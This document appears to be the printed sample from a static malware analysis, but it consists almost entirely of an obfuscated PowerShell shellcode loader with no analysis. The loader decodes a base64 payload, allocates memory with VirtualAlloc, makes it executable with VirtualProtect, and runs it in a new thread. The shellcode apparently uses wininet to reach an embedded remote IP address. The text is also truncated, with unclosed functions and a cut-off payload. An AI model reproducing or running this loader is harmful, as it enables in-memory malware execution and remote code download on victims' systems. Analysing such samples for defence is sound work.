Static Analysis

function kX {

Param ($tb5sE, $wNuO)

$vYXXw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

return $vYXXw.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($vYXXw.GetMethod('GetModuleHandle')).Invoke($null, @($tb5sE)))), $wNuO))

function zV2s3 {

Param (

[Parameter(Position = 0, Mandatory = $True)] [Type[]] $is2T,

[Parameter(Position = 1)] [Type] $tQpP6 = [Void]

)

$kq9_ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

$kq9_.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $is2T).SetImplementationFlags('Runtime, Managed')

$kq9_.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tQpP6, $is2T).SetImplementationFlags('Runtime, Managed')

return $kq9_.CreateType()

[Byte[]]$cpLgJ = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSA+3SkpNMclIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FBEi0Agi0gYSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYSAHQQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxLjE0LjI0Ny4xNjIAWkiJwUnHwEGcAABNMclTU2oDU0m6V4mfxgAAAAD/1ej6AAAAL1Fzc1Q4aGwyNHp1eGZyQjgxS241VEFrajVPb3BuLXNyYlhkRVFraWpoMWJMTGpGZ1MxQzJ1TmFWN0FIUW1GWGFQVFZxX09TZ2ZSc2tFYkpYOWNHaUIyaUZ3bks4cG5iTzB0UVNSaGJZcDl6SXBYYWU0MDFHZkR5ZXMyV1V0clh2a1lzOU1TalpiSmZubTZxQzhqQWFJZVoxUl8wVXJISXNpek13ZmVnWmZqR2V4RGVhZDNCUmlQcW5xNzdDdlo3SXZwV2VYVUFUbmFySTBKTFpOYzlabjZMUFJfMkQ3QXByUWlxX1h0ZS00LXJYNHlWZXprTFp3bXFOAEiJwVNaQVhNMclTSLgAAiiEAAAAAFBTU0nHwutVLjv/1UiJxmoKX1NaSInxTTHJTTHJU1NJx8ItBhh7/9WFwHUfSMfBiBMAAEm6RPA14AAAAAD/1Uj/z3QC68zoVQAAAFNZakBaSYnRweIQScfAABAAAEm6WKRT5QAAAAD/1UiTU1NIiedIifFIidpJx8AAIAAASYn5SboSlon

[Uint32]$w4 = 0

$gJtz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll VirtualAlloc), (zV2s3 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $cpLgJ.Length,0x3000, 0x04)

[System.Runtime.InteropServices.Marshal]::Copy($cpLgJ, 0, $gJtz, $cpLgJ.length)

if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll VirtualProtect), (zV2s3 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($gJtz, [Uint32]$cpLgJ.Length, 0x10, [Ref]$w4)) -eq $true) {

$dl = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll CreateThread), (zV2s3 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$gJtz,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll WaitForSingleObject), (zV2s3 @([IntPtr], [Int32]))).Invoke($dl,0xffffffff) | Out-Null